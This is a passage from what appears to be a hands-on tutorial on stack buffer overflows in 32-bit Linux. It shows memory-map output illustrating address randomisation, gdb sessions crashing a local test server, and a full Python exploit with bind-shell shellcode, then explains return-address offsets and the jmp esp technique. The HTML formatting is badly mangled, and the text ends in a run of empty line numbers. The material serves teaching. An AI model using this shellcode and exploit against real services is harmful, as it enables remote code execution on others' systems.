0015f000 08:01 1045302 /lib/i386-linux-gnu/i686/cmov/libc-2.13.so/span/span span class="code-line"span class="go"b779d000-b77a0000 rw-p 00000000 00:00 0 /span/span span class="code-line"span class="go"b77ac000-b77ad000 r--p 00000000 08:01 961741 /usr/lib/locale/gez_ET@abegede/LC_NUMERIC/span/span span class="code-line"span class="go"b77ad000-b77ae000 r--p 00000000 08:01 962466 /usr/lib/locale/en_ZM/LC_TIME/span/span span class="code-line"span class="go"b77ae000-b77af000 r--p 00000000 08:01 962019 /usr/lib/locale/gv_GB.utf8/LC_MONETARY/span/span span class="code-line"span class="go"b77af000-b77b0000 r--p 00000000 08:01 1071064 /usr/lib/locale/ne_NP/LC_MESSAGES/SYS_LC_MESSAGES/span/span span class="code-line"span class="go"b77b0000-b77b1000 r--p 00000000 08:01 1065713 /usr/lib/locale/sr_RS/LC_PAPER/span/span span class="code-line"span class="go"b77b1000-b77b2000 r--p 00000000 08:01 962122 /usr/lib/locale/cy_GB.utf8/LC_NAME/span/span span class="code-line"span class="go"b77b2000-b77b3000 r--p 00000000 08:01 962015 /usr/lib/locale/gv_GB.utf8/LC_ADDRESS/span/span span class="code-line"span class="go"b77b3000-b77b4000 r--p 00000000 08:01 962121 /usr/lib/locale/cy_GB.utf8/LC_TELEPHONE/span/span span class="code-line"span class="go"b77b4000-b77b5000 r--p 00000000 08:01 1066122 /usr/lib/locale/sr_RS/LC_MEASUREMENT/span/span span class="code-line"span class="go"b77b5000-b77bc000 r--s 00000000 08:01 827509 /usr/lib/i386-linux-gnu/gconv/gconv-modules.cache/span/span span class="code-line"span class="go"b77bc000-b77bd000 r--p 00000000 08:01 963555 /usr/lib/locale/en_GB.utf8/LC_IDENTIFICATION/span/span span class="code-line"span class="go"b77bd000-b77bf000 rw-p 00000000 00:00 0 /span/span span class="code-line"span class="go"b77bf000-b77c0000 r-xp 00000000 00:00 0 [vdso]/span/span span class="code-line"span class="go"b77c0000-b77dc000 r-xp 00000000 08:01 1062553 /lib/i386-linux-gnu/ld-2.13.so/span/span span class="code-line"span class="go"b77dc000-b77dd000 r--p 0001b000 08:01 1062553 /lib/i386-linux-gnu/ld-2.13.so/span/span span class="code-line"span class="go"b77dd000-b77de000 rw-p 0001c000 08:01 1062553 /lib/i386-linux-gnu/ld-2.13.so/span/span span class="code-line"span class="go"bfad4000-bfaf5000 rw-p 00000000 00:00 0 [stack]/span/span span class="code-line"span class="gp"appuser@dev:~$ /spancat /proc/self/maps/span span class="code-line"span class="go"08048000-08054000 r-xp 00000000 08:01 783374 /bin/cat/span/span span class="code-line"span class="go"08054000-08055000 r--p 0000b000 08:01 783374 /bin/cat/span/span span class="code-line"span class="go"08055000-08056000 rw-p 0000c000 08:01 783374 /bin/cat/span/span span class="code-line"span class="go"09908000-09929000 rw-p 00000000 00:00 0 [heap]/span/span span class="code-line"span class="go"b7435000-b7474000 r--p 00000000 08:01 1066328 /usr/lib/locale/pap_AN/LC_CTYPE/span/span span class="code-line"span class="go"b7474000-b7592000 r--p 00000000 08:01 1066368 /usr/lib/locale/pap_AN/LC_COLLATE/span/span span class="code-line"span class="go"b7592000-b7593000 rw-p 00000000 00:00 0 /span/span span class="code-line"span class="go"b7593000-b76f0000 r-xp 00000000 08:01 1045302 /lib/i386-linux-gnu/i686/cmov/libc-2.13.so/span/span span class="code-line"span class="go"b76f0000-b76f1000 ---p 0015d000 08:01 1045302 /lib/i386-linux-gnu/i686/cmov/libc-2.13.so/span/span span class="code-line"span class="go"b76f1000-b76f3000 r--p 0015d000 08:01 1045302 /lib/i386-linux-gnu/i686/cmov/libc-2.13.so/span/span span class="code-line"span class="go"b76f3000-b76f4000 rw-p 0015f000 08:01 1045302 /lib/i386-linux-gnu/i686/cmov/libc-2.13.so/span/span span class="code-line"span class="go"b76f4000-b76f7000 rw-p 00000000 00:00 0 /span/span span class="code-line"span class="go"b7703000-b7704000 r--p 00000000 08:01 961741 /usr/lib/locale/gez_ET@abegede/LC_NUMERIC/span/span span class="code-line"span class="go"b7704000-b7705000 r--p 00000000 08:01 962466 /usr/lib/locale/en_ZM/LC_TIME/span/span span class="code-line"span class="go"b7705000-b7706000 r--p 00000000 08:01 962019 /usr/lib/locale/gv_GB.utf8/LC_MONETARY/span/span span class="code-line"span class="go"b7706000-b7707000 r--p 00000000 08:01 1071064 /usr/lib/locale/ne_NP/LC_MESSAGES/SYS_LC_MESSAGES/span/span span class="code-line"span class="go"b7707000-b7708000 r--p 00000000 08:01 1065713 /usr/lib/locale/sr_RS/LC_PAPER/span/span span class="code-line"span class="go"b7708000-b7709000 r--p 00000000 08:01 962122 /usr/lib/locale/cy_GB.utf8/LC_NAME/span/span span class="code-line"span class="go"b7709000-b770a000 r--p 00000000 08:01 962015 /usr/lib/locale/gv_GB.utf8/LC_ADDRESS/span/span span class="code-line"span class="go"b770a000-b770b000 r--p 00000000 08:01 962121 /usr/lib/locale/cy_GB.utf8/LC_TELEPHONE/span/span span class="code-line"span class="go"b770b000-b770c000 r--p 00000000 08:01 1066122 /usr/lib/locale/sr_RS/LC_MEASUREMENT/span/span span class="code-line"span class="go"b770c000-b7713000 r--s 00000000 08:01 827509 /usr/lib/i386-linux-gnu/gconv/gconv-modules.cache/span/span span class="code-line"span class="go"b7713000-b7714000 r--p 00000000 08:01 963555 /usr/lib/locale/en_GB.utf8/LC_IDENTIFICATION/span/span span class="code-line"span class="go"b7714000-b7716000 rw-p 00000000 00:00 0 /span/span span class="code-line"span class="go"b7716000-b7717000 r-xp 00000000 00:00 0 [vdso]/span/span span class="code-line"span class="go"b7717000-b7733000 r-xp 00000000 08:01 1062553 /lib/i386-linux-gnu/ld-2.13.so/span/span span class="code-line"span class="go"b7733000-b7734000 r--p 0001b000 08:01 1062553 /lib/i386-linux-gnu/ld-2.13.so/span/span span class="code-line"span class="go"b7734000-b7735000 rw-p 0001c000 08:01 1062553 /lib/i386-linux-gnu/ld-2.13.so/span/span span class="code-line"span class="go"bfc79000-bfc9a000 rw-p 00000000 00:00 0 [stack]/span/span span class="code-line"/code/pre/div /td/tr/table pThis command displays the memory ranges of each memory segment inside the codecat/code commands own virtual memory space./p pAs you can see, all of the memory segments are changing their ranges except for the top 3. These top 3 belong to the actual code of the application./p pThis means that we can only predict memory addresses of the actual code of the application and nothing that is dynamically loaded or writable./p pEvery payload we have sent until now has been placed on the codestack/code, which is at the very bottom of the memory segment list on the output and this section of memory isn't static so we can no longer predict the address of our payload (the shellcode)./p h2Testing The App/h2 table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"appuser@dev:~$ /span./app-net/span span class="code-line"/code/pre/div /td/tr/table pWe already know a lot about this application, lets try our exploit from last time:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"testuser@dev:~$ /spanpython app-net-fuzz.py /span span class="code-line"span class="go"532/span/span span class="code-line"/code/pre/div /td/tr/table table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"appuser@dev:~$ /spangdb -q ./app-net /span span class="code-line"span class="go"Reading symbols from /home/appuser/app-net...(no debugging symbols found)...done./span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"r/span/span span class="code-line"span class="go"Starting program: /home/appuser/app-net /span/span span class="code-line"/code/pre/div /td/tr/table table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"testuser@dev:~$ /spanpython -c span class="s1"#39;print quot;Aquot;*532#39;/span span class="p"|/span nc span class="m"127/span.0.0.1 span class="m"9999/span/span span class="code-line"/code/pre/div /td/tr/table table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/span span class="code-line"span class="normal"5/span/span span class="code-line"span class="normal"6/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="go"Program received signal SIGSEGV, Segmentation fault./span/span span class="code-line"span class="go"0x0804000a in ?? ()/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"r/span/span span class="code-line"span class="go"The program being debugged has been started already./span/span span class="code-line"span class="go"Start it from the beginning? (y or n) y/span/span span class="code-line"span class="go"Starting program: /home/appuser/app-net/span/span span class="code-line"/code/pre/div /td/tr/table table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"testuser@dev:~$ /spanpython -c span class="s1"#39;print quot;Aquot;*536#39;/span span class="p"|/span nc span class="m"127/span.0.0.1 span class="m"9999/span/span span class="code-line"/code/pre/div /td/tr/table table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="go"Program received signal SIGSEGV, Segmentation fault./span/span span class="code-line"span class="go"0x41414141 in ?? ()/span/span span class="code-line"/code/pre/div /td/tr/table table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"appuser@dev:~$ /span./app-net /span span class="code-line"/code/pre/div /td/tr/table table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"root@dev:~# /spanps ax span class="p"|/span grep app-net/span span class="code-line"span class="go"26854 pts/0 S+ 0:00 ./app-net/span/span span class="code-line"span class="go"26951 pts/2 S+ 0:00 grep app-net/span/span span class="code-line"span class="gp"root@dev:~# /spangdb -q -p span class="m"26854/span/span span class="code-line"span class="go"Attaching to process 26854/span/span span class="code-line"span class="go"Reading symbols from /home/appuser/app-net...(no debugging symbols found)...done./span/span span class="code-line"span class="go"Reading symbols from /lib/i386-linux-gnu/i686/cmov/libc.so.6...(no debugging symbols found)...done./span/span span class="code-line"span class="go"Loaded symbols for /lib/i386-linux-gnu/i686/cmov/libc.so.6/span/span span class="code-line"span class="go"Reading symbols from /lib/ld-linux.so.2...(no debugging symbols found)...done./span/span span class="code-line"span class="go"Loaded symbols for /lib/ld-linux.so.2/span/span span class="code-line"span class="go"0xb77c0424 in __kernel_vsyscall ()/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"c/span/span span class="code-line"span class="go"Continuing./span/span span class="code-line"/code/pre/div /td/tr/table table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"testuser@dev:~$ /spanpython -c span class="s1"#39;print quot;Aquot;*536#39;/span span class="p"|/span nc span class="m"127/span.0.0.1 span class="m"9999/span/span span class="code-line"/code/pre/div /td/tr/table table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/span span class="code-line"span class="normal"5/span/span span class="code-line"span class="normal"6/span/span span class="code-line"span class="normal"7/span/span span class="code-line"span class="normal"8/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="go"Program received signal SIGSEGV, Segmentation fault./span/span span class="code-line"span class="go"0x41414141 in ?? ()/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"x/20xw $esp/span/span span class="code-line"span class="go"0xbfaeb670: 0xbfae000a 0xbfaeb694 0x000003e8 0x00000000/span/span span class="code-line"span class="go"0xbfaeb680: 0xbfaeba80 0xbfaeba7c 0x000057a8 0x00000006/span/span span class="code-line"span class="go"0xbfaeb690: 0x00001000 0x41414141 0x41414141 0x41414141/span/span span class="code-line"span class="go"0xbfaeb6a0: 0x41414141 0x41414141 0x41414141 0x41414141/span/span span class="code-line"span class="go"0xbfaeb6b0: 0x41414141 0x41414141 0x41414141 0x41414141/span/span span class="code-line"/code/pre/div /td/tr/table table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"appuser@dev:~$ /span./app-net/span span class="code-line"/code/pre/div /td/tr/table table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/span span class="code-line"span class="normal"20/span/span span class="code-line"span class="normal"21/span/span span class="code-line"span class="normal"22/span/span span class="code-line"span class="normal"23/span/span span class="code-line"span class="normal"24/span/span span class="code-line"span class="normal"25/span/span span class="code-line"span class="normal"26/span/span span class="code-line"span class="normal"27/span/span span class="code-line"span class="normal"28/span/span span class="code-line"span class="normal"29/span/span span class="code-line"span class="normal"30/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"testuser@dev:~$ /spancat app-net-exploit.py /span span class="code-line"span class="gp"#/span!/usr/bin/env python/span span class="code-line"/span span class="code-line"span class="go"import socket/span/span span class="code-line"/span span class="code-line"span class="go"shellcode = quot;\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\x17\x31\xdb\xcd\x80\x89\xd8\xb0\x66\xb3\x01\x51\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x89\xc6\xb0\x66\xb3\x02\x52\x66\x68\x27\x0e\x66\x53\x89\xe1\x6a\x10\x51\x56\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x6a\x01\x56\x89\xe1\xcd\x80\xb0\x66\xb3\x05\x52\x52\x56\x89\xe1\xcd\x80\x89\xc3\x31\xc9\xb1\x03\xfe\xc9\xb0\x3f\xcd\x80\x75\xf8\x31\xc0\x52\x68\x62\x61\x73\x68\x68\x62\x69\x6e\x2f\x68\x2f\x2f\x2f\x2f\x89\xe3\x52\x53\x89\xe1\x52\x89\xe2\xb0\x0b\xcd\x80quot;/span/span span class="code-line"/span span class="code-line"span class="go"payload = quot;\x90quot; * 406 # (532 - 119) - 7 = 406/span/span span class="code-line"/span span class="code-line"span class="go"payload += shellcode # append our shellcode/span/span span class="code-line"/span span class="code-line"span class="go"payload += quot;\x90quot; * 7 # another 7 bytes/span/span span class="code-line"/span span class="code-line"span class="go"payload += quot;\x94\xb6\xae\xbfquot; # the address of our shellcode/span/span span class="code-line"span class="gp" # /spanspan class="k"in/span reverse span class="o"(/spanlittle endianspan class="o")/span/span span class="code-line"/span span class="code-line"span class="gp"# /spancreate the tcp socket/span span class="code-line"span class="go"s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)/span/span span class="code-line"/span span class="code-line"span class="gp"# /spanconnect to span class="m"127/span.0.0.1 port span class="m"9999/span/span span class="code-line"span class="go"s.connect((quot;127.0.0.1quot;, 9999))/span/span span class="code-line"/span span class="code-line"span class="gp"# /spansend our payload/span span class="code-line"span class="go"s.send(payload)/span/span span class="code-line"/span span class="code-line"span class="gp"# /spanclose the socket/span span class="code-line"span class="go"s.close()/span/span span class="code-line"span class="gp"testuser@dev:~$ /spanpython app-net-exploit.py /span span class="code-line"span class="gp"testuser@dev:~$ /spannc span class="m"127/span.0.0.1 span class="m"9998/span/span span class="code-line"span class="go"nc: unable to connect to address 127.0.0.1, service 9998/span/span span class="code-line"/code/pre/div /td/tr/table pAs you can see, the exploit that we used last time didn't work. The reason for this is because the position of the stack has moved, so the shellcode isn't at the same address everytime the application is launched./p pThe offset here before we start overwriting EIP is 532. I want to explain quickly why this is./p pWe have 3 local variables, codechar p[512];/code (on line 100 of the source) and codeint r, i;/code (on line 101)./p pThese variables go on to the stack in reverse order, so first (closest to the beginning of the a href="https://en.wikipedia.org/wiki/Call_stack#Structure" target="_blank"stack frame/a) codei/code, then coder/code and lastly codep/code./p pWhen writes happen here they happen in the opposite direction, so a write at codep/code will eventually overwrite coder/code (after filling up the reserved space for codep/code) and then codei/code./p pWe are reserving 512 bytes for codep/code, each int is 4 bytes long, so that is 520. The stack has to be aligned to 16 byte boundaries, so we need to add another 8 bytes, making it 528 bytes./p pLastly right under the local variables we have the saved EBP from the calling function, this is another 4 bytes. The return address is stored right after the saved EBP so that takes us to 532 bytes./p h2Returning From A Function/h2 pI explained this in much more detail in part a href="/x86-32-linux/reverse-engineering/2014/07/01/basic-binary-auditing/"4/a but just before a function returns, the stack looks like this:/p pimg src="/assets/images/x86-32-linux/stack2.jpg" width="300"/p pThe strongRET ADDR/strong is what we are overwriting to take control of EIP. What happens next is the strongRET ADDR/strong gets strongpopped/strong off of the stack into the EIP register and the stack then looks like this:/p pimg src="/assets/images/x86-32-linux/stack1.jpg" width="300"/p pThis means that the value of the ESP register will always point to the memory address on the stack right after we overwrite EIP, at 536 bytes into our payload (532 + 4 for EIP)./p pSo if we write our shellcode after we overwrite EIP then we know that ESP is pointing to it./p pAn instruction that is fairly common among all normal sized applications is codejmp esp/code. This instruction tells EIP to point to the address that ESP is pointing to./p pUsing this instruction we can execute our shellcode but first we have to find it in the application's a href="https://en.wikipedia.org/wiki/Code_segment" target="_blank"text segment/a because we know it will never change address if it is in this section./p h2Finding JMP ESP/h2 pFirst let's look at the disassembly using codeobjdump -d ./app-net -M intel/code:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal" 10/span/span span class="code-line"span class="normal" 11/span/span span class="code-line"span class="normal" 12/span/span span class="code-line"span class="normal" 13/span/span span class="code-line"span class="normal" 14/span/span span class="code-line"span class="normal" 15/span/span span class="code-line"span class="normal" 16/span/span span class="code-line"span class="normal" 17/span/span span class="code-line"span class="normal" 18/span/span span class="code-line"span class="normal" 19/span/span span class="code-line"span class="normal" 20/span/span span class="code-line"span class="normal" 21/span/span span class="code-line"span class="normal" 22/span/span span class="code-line"span class="normal" 23/span/span span class="code-line"span class="normal" 24/span/span span class="code-line"span class="normal" 25/span/span span class="code-line"span class="normal" 26/span/span span class="code-line"span class="normal" 27/span/span span class="code-line"span class="normal" 28/span/span span class="code-line"span class="normal" 29/span/span span class="code-line"span class="normal" 30/span/span span class="code-line"span class="normal" 31/span/span span class="code-line"span class="normal" 32/span/span span class="code-line"span class="normal" 33/span/span span class="code-line"span class="normal" 34/span/span span class="code-line"span class="normal" 35/span/span span class="code-line"span class="normal" 36/span/span span class="code-line"span class="normal" 37/span/span span class="code-line"span class="normal" 38/span/span span class="code-line"span class="normal" 39/span/span span class="code-line"span class="normal" 40/span/span span class="code-line"span class="normal" 41/span/span span class="code-line"span class="normal" 42/span/span span class="code-line"span class="normal" 43/span/span span class="code-line"span class="normal" 44/span/span span class="code-line"span class="normal" 45/span/span span class="code-line"span class="normal" 46/span/span span class="code-line"span class="normal" 47/span/span span class="code-line"span class="normal" 48/span/span span class="code-line"span class="normal" 49/span/span span class="code-line"span class="normal" 50/span/span span class="code-line"span class="normal" 51/span/span span class="code-line"span class="normal" 52/span/span span class="code-line"span class="normal" 53/span/span span class="code-line"span class="normal" 54/span/span span class="code-line"span class="normal" 55/span/span span class="code-line"span class="normal" 56/span/span span class="code-line"span class="normal" 57/span/span span class="code-line"span class="normal" 58/span/span span class="code-line"span class="normal" 59/span/span span class="code-line"span class="normal" 60/span/span span class="code-line"span class="normal" 61/span/span span class="code-line"span class="normal" 62/span/span span class="code-line"span class="normal" 63/span/span span class="code-line"span class="normal" 64/span/span span class="code-line"span class="normal" 65/span/span span class="code-line"span class="normal" 66/span/span span class="code-line"span class="normal" 67/span/span span class="code-line"span class="normal" 68/span/span span class="code-line"span class="normal" 69/span/span span class="code-line"span class="normal" 70/span/span span class="code-line"span class="normal" 71/span/span span class="code-line"span class="normal" 72/span/span span class="code-line"span class="normal" 73/span/span span class="code-line"span class="normal" 74/span/span span class="code-line"span class="normal" 75/span/span span class="code-line"span class="normal" 76/span/span span class="code-line"span class="normal" 77/span/span span class="code-line"span class="normal" 78/span/span span class="code-line"span class="normal" 79/span/span span class="code-line"span class="normal" 80/span/span span class="code-line"span class="normal" 81/span/span span class="code-line"span class="normal" 82/span/span span class="code-line"span class="normal" 83/span/span span class="code-line"span class="normal" 84/span/span span class="code-line"span class="normal" 85/span/span span class="code-line"span class="normal" 86/span/span span class="code-line"span class="normal" 87/span/span span class="code-line"span class="normal" 88/span/span span class="code-line"span class="normal" 89/span/span span class="code-line"span class="normal" 90/span/span span class="code-line"span class="normal" 91/span/span span class="code-line"span class="normal" 92/span/span span class="code-line"span class="normal" 93/span/span span class="code-line"span class="normal" 94/span/span span class="code-line"span class="normal" 95/span/span span class="code-line"span class="normal" 96/span/span span class="code-line"span class="normal" 97/span/span span class="code-line"span class="normal" 98/span/span span class="code-line"span class="normal" 99/span/span span class="code-line"span class="normal"100/span/span span class="code-line"span class="normal"101/span/span span class="code-line"span class="normal"102/span/span span class="code-line"span class="normal"103/span/span span class="code-line"span class="normal"104/span/span span class="code-line"span class="normal"105/span/span span class="code-line"span class="normal"106/span/span span class="code-line"span class="normal"107/span/span span class="code-line"span class="normal"108/span/span span class="code-line"span class="normal"109/span/span span class="code-line"span class="normal"110/span/span span class="code-line"span class="normal"111/span/span span class="code-line"span class="normal"112/span/span span class="code-line"span class="normal"113/span/span span class="code-line"span class="normal"114/span/span span class="code-line"span class="normal"115/span/span span class="code-line"span class="normal"116/span/span span class="code-line"span class="normal"117/span/span span class="code-line"span class="normal"118/span/span span class="code-line"span class="normal"119/span/span span class="code-line"span class="normal"120/span/span span class="code-line"span class="normal"121/span/span span class="code-line"span class="normal"122/span/span span class="code-line"span class="normal"123/span/span span class="code-line"span class="normal"124/span/span span class="code-line"span class="normal"125/span/span span class="code-line"span class="normal"126/span/span span class="code-line"span class="normal"127/span/span span class="code-line"span class="normal"128/span/span span class="code-line"span class="normal"129/span/span span class="code-line"span class="normal"130/span/span span class="code-line"span class="normal"131/span/span span class="code-line"span class="normal"132/span/span span class="code-line"span class="normal"133/span/span span class="code-line"span class="normal"134/span/span span class="code-line"span class="normal"135/span/span span class="code-line"span class="normal"136/span/span span class="code-line"span class="normal"137/span/span span class="code-line"span class="normal"138/span/span span class="code-line"span class="normal"139/span/span span class="code-line"span class="normal"140/span/span span class="code-line"span class="normal"141/span/span span class="code-line"span class="normal"142/span/span span class="code-line"span class="normal"143/span/span span class="code-line"span class="normal"144/span/span span class="code-line"span class="normal"145/span/span span class="code-line"span class="normal"146/span/span span class="code-line"span class="normal"147/span/span span class="code-line"span class="normal"148/span/span span class="code-line"span class="normal"149/span/span span class="code-line"span class="normal"150/span/span span class="code-line"span class="normal"151/span/span span class="code-line"span class="normal"152/span/span span class="code-line"span class="normal"153/span/span span class="code-line"span class="normal"154/span/span span class="code-line"span class="normal"155/span/span span class="code-line"span class="normal"156/span/span span class="code-line"span class="normal"157/span/span span class="code-line"span class="normal"158/span/span span class="code-line"span class="normal"159/span/span span class="code-line"span class="normal"160/span/span span class="code-line"span class="normal"161/span/span span class="code-line"span class="normal"162/span/span span class="code-line"span class="normal"163/span/span span class="code-line"span class="normal"164/span/span span class="code-line"span class="normal"165/span/span span class="code-line"span class="normal"166/span/span span class="code-line"span class="normal"167/span/span span class="code-line"span class="normal"168/span/span span class="code-line"span class="normal"169/span/span span class="code-line"span class="normal"170/span/span span class="code-line"span class="normal"171/span/span span class="code-line"span class="normal"172/span/span span class="code-line"span class="normal"173/span/span span class="code-line"span class="normal"174/span/span span class="code-line"span class="normal"175/span/span span class="code-line"span class="normal"176/span/span span class="code-line"span class="normal"177/span/span span class="code-line"span class="normal"178/span/span span class="code-line"span class="normal"179/span/span span class="code-line"span class="normal"180/span/span span class="code-line"span class="normal"181/span/span span class="code-line"span class="normal"182/span/span span class="code-line"span class="normal"183/span/span span class="code-line"span class="normal"184/span/span span class="code-line"span class="normal"185/span/span span class="code-line"span class="normal"186/span/span span class="code-line"span class="normal"187/span/span span class="code-line"span class="normal"188/span/span span class="code-line"span class="normal"189/span/span span class="code-line"span class="normal"190/span/span span class="code-line"span class="normal"191/span/span span class="code-line"span class="normal"192/span/span span class="code-line"span class="normal"193/span/span span class="code-line"span class="normal"194/span/span span class="code-line"span class="normal"195/span/span span class="code-line"span class="normal"196/span/span span class="code-line"span class="normal"197/span/span span class="code-line"span class="normal"198/span/span span class="code-line"span class="normal"199/span/span span class="code-line"span class="normal"200/span/span span class="code-line"span class="normal"201/span/span span class="code-line"span class="normal"202/span/span span class="code-line"span class="normal"203/span/span span class="code-line"span class="normal"204/span/span span class="code-line"span class="normal"205/span/span span class="code-line"span class="normal"206/span/span span class="code-line"span class="normal"207/span/span span class="code-line"span class="normal"208/span/span span class="code-line"span class="normal"209/span/span span class="code-line"span class="normal"210/span/span span class="code-line"span class="normal"211/span/span span class="code-line"span class="normal"212/span/span span class="code-line"span class="normal"213/span/span span class="code-line"span class="normal"214/span/span span class="code-line"span class="normal"215/span/span span class="code-line"span class="normal"216/span/span span class="code-line"span class="normal"217/span/span span class="code-line"span class="normal"218/span/span span class="code-line"span class="normal"219/span/span span class="code-line"span class="normal"220/span/span span class="code-line"span class="normal"221/span/span span class="code-line"span class="normal"222/span/span span class="code-line"span class="normal"223/span/span span class="code-line"span class="normal"224/span/span span class="code-line"span class="normal"225/span/span span class="code-line"span class="normal"226/span/span span class="code-line"span class="normal"227/span/span span class="code-line"span class="normal"228/span/span span class="code-line"span class="normal"229/span/span span class="code-line"span class="normal"230/span/span span class="code-line"span class="normal"231/span/span span class="code-line"span class="normal"232/span/span span class="code-line"span class="normal"233/span/span span class="code-line"span class="normal"234/span/span span class="code-line"span class="normal"235/span/span span class="code-line"span class="normal"236/span/span span class="code-line"span class="normal"237/span/span span class="code-line"span class="normal"238/span/span span class="code-line"span class="normal"239/span/span span class="code-line"span class="normal"240/span/span span class="code-line"span class="normal"241/span/span span class="code-line"span class="normal"242/span/span span class="code-line"span class="normal"243/span/span span class="code-line"span class="normal"244/span/span span class="code-line"span class="normal"245/span/span span class="code-line"span class="normal"246/span/span span class="code-line"span class="normal"247/span/span span class="code-line"span class="normal"248/span/span span class="code-line"span class="normal"249/span/span span class="code-line"span class="normal"250/span/span span class="code-line"span class="normal"251/span/span span class="code-line"span class="normal"252/span/span span class="code-line"span class="normal"253/span/span span class="code-line"span class="normal"254/span/span span class="code-line"span class="normal"255/span/span span class="code-line"span class="normal"256/span/span span class="code-line"span class="normal"257/span/span span class="code-line"span class="normal"258/span/span span class="code-line"span class="normal"259/span/span span class="code-line"span class="normal"260/span/span span class="code-line"span class="normal"261/span/span span class="code-line"span class="normal"262/span/span span class="code-line"span class="normal"263/span/span span class="code-line"span class="normal"264/span/span span class="code-line"span class="normal"265/span/span span class="code-line"span class="normal"266/span/span span class="code-line"span class="normal"267/span/span span class="code-line"span class="normal"268/span/span span class="code-line"span class="normal"269/span/span span class="code-line"span class="normal"270/span/span span class="code-line"span class="normal"271/span/span span class="code-line"span class="normal"272/span/span span class="code-line"span class="normal"273/span/span span class="code-line"span class="normal"274/span/span span class="code-line"span class="normal"275/span/span span class="code-line"span class="normal"276/span/span span class="code-line"span class="normal"277/span/span span class="code-line"span class="normal"278/span/span span class="code-line"span class="normal"279/span/span span class="code-line"span class="normal"280/span/span span class="code-line"span class="normal"281/span/span span class="code-line"span class="normal"282/span/span span class="code-line"span class="normal"283/span/span span class="code-line"span class="normal"284/span/span span class="code-line"span class="normal"285/span/span span class="code-line"span class="normal"286/span/span span class="code-line"span class="normal"287/span/span span class="code-line"span class="normal"288/span/span span class="code-line"span class="normal"289/span/span span class="code-line"span class="normal"290/span/span span class="code-line"span class="normal"291/span/span span class="code-line"span class="normal"292/span/span span class="code-line"span class="normal"293/span/span span class="code-line"span class="normal"294/span/span span class="code-line"span class="normal"295/span/span span class="code-line"span class="normal"296/span/span span class="code-line"span class="normal"297/span/span span class="code-line"span class="normal"298/span/span span class="code-line"span class="normal"299/span/span 